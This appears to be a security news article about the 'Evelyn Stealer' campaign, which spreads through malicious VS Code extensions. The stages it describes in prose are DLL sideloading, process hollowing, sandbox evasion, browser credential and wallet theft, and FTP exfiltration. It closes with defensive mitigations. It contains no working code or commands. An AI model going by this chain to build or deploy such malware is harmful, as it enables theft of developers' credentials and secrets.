A newly analyzed campaign dubbed “Evelyn Stealer” is turning the Visual Studio Code (VSC) extension ecosystem into an attack delivery platform, enabling threat actors to compromise software developers and pivot deeper into enterprise environments.
The campaign abuses seemingly legitimate extensions including a “Bitcoin Black” theme and a “Codo AI” coding assistant as the initial lure.
While they present as a cosmetic theme and a functional AI helper, both extensions contain hidden logic that executes PowerShell and batch scripts on activation, downloading and staging the malware in the background.
The operation, detailed by Koi Security and TrendAI researchers, chains malicious VSC extensions, DLL hijacking, process hollowing, and anti-analysis techniques into a mature multi-stage data theft pipeline that directly targets high-value developer workstations.
Once installed, the extensions deliver the legitimate Lightshot screenshot utility paired with a trojanized DLL, leveraging classic DLL hijacking to execute attacker-controlled code under the guise of a trusted binary.
The first-stage payload, Lightshot.dll, masquerades as a legitimate Lightshot component and is sideloaded by Lightshot.exe.
When loaded, the DLL immediately runs its own payload, exposing benign-looking exports to blend in and implementing a singleton-style mutex to ensure only one instance executes on each host.
It then spawns a hidden PowerShell command to retrieve a second-stage executable into the user’s Temp directory as “runtime.exe,” establishing the foundation for a deeper intrusion chain.
This second stage, identified as iknowyou.model, functions as a process-hollowing injector. It creates a suspended instance of the Windows process grpconv.exe and decrypts the embedded Evelyn Stealer payload using AES‑256‑CBC, with hardcoded key and IV values.
After decryption, the malware replaces the memory of the suspended grpconv.exe instance with the Evelyn Stealer code and resumes execution, allowing the final payload to operate inside a legitimate Windows process and evade basic behavioral and signature-based security controls.
Once active, Evelyn Stealer dynamically resolves Windows APIs for process injection, file and registry operations, network communication, and clipboard access.
The malware performs extensive environment checks, including GPU, hostname, disk size, process, and registry analysis, and incorporates virtual machine and debugger detection to avoid sandboxes and research environments.
If the system passes these checks, Evelyn creates its own working directory in the user’s AppData path and begins harvesting data at scale.
The stealer focuses heavily on browser-centric data theft and session hijacking. It restores and kills active browser processes, then launches new hidden browser instances (for example, Chrome or Edge) with a long list of flags such as “–headless=new,” “–no-sandbox,” “–disable-extensions,” “–disable-logging,” and off-screen, 1×1-pixel windows to minimize user visibility and forensic traces.
A dedicated browser injection DLL, abe_decrypt.dll, is fetched from the Temp directory, the attacker’s FTP server, or the current working directory and injected to extract credentials, cookies, and session data.
Browser data, Evelyn Stealer captures clipboard contents, stored Wi‑Fi credentials, system information, installed software lists, running processes, VPN configuration, and multiple categories of cryptocurrency wallet data.
Collected artifacts are staged into a ZIP archive whose filename encodes rich context, including country, IP address, username, OS version, hardware information, and wallet-related flags, before being exfiltrated over FTP to attacker-controlled infrastructure.
Mitigations
The threat has clear implications for organizations that rely on VSC and third-party extensions across development, DevOps, and production environments.
Once the malware collects all the necessary information, it archives the data into a ZIP file and sends it to the attacker’s C&C server over FTP.
Compromised developer machines provide adversaries with direct access to source code, secrets, CI/CD pipelines, cloud consoles, and digital assets such as cryptocurrency.
The Evelyn campaign demonstrates how attackers are operationalizing trust in developer tools and marketplaces, iterating on social engineering themes (dark crypto-inspired themes, AI copilots) while refining their delivery chain.
Vendors such as TrendAI Vision One report detection and blocking coverage for Evelyn-related indicators of compromise and provide hunting queries and threat intelligence to help defenders identify malicious extensions, payloads, and C2 infrastructure.
For enterprises, the campaign underscores the urgency of treating developer environments as high-risk assets: enforcing strict extension vetting, monitoring for anomalous PowerShell and headless browser activity, hardening against DLL hijacking, and applying zero-trust principles to development and build systems.
As AI-powered assistants and rich extension ecosystems proliferate in IDEs, similar campaigns weaponizing developer tooling are likely to accelerate, making proactive controls and continuous monitoring essential to protecting both code and critical business infrastructure.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.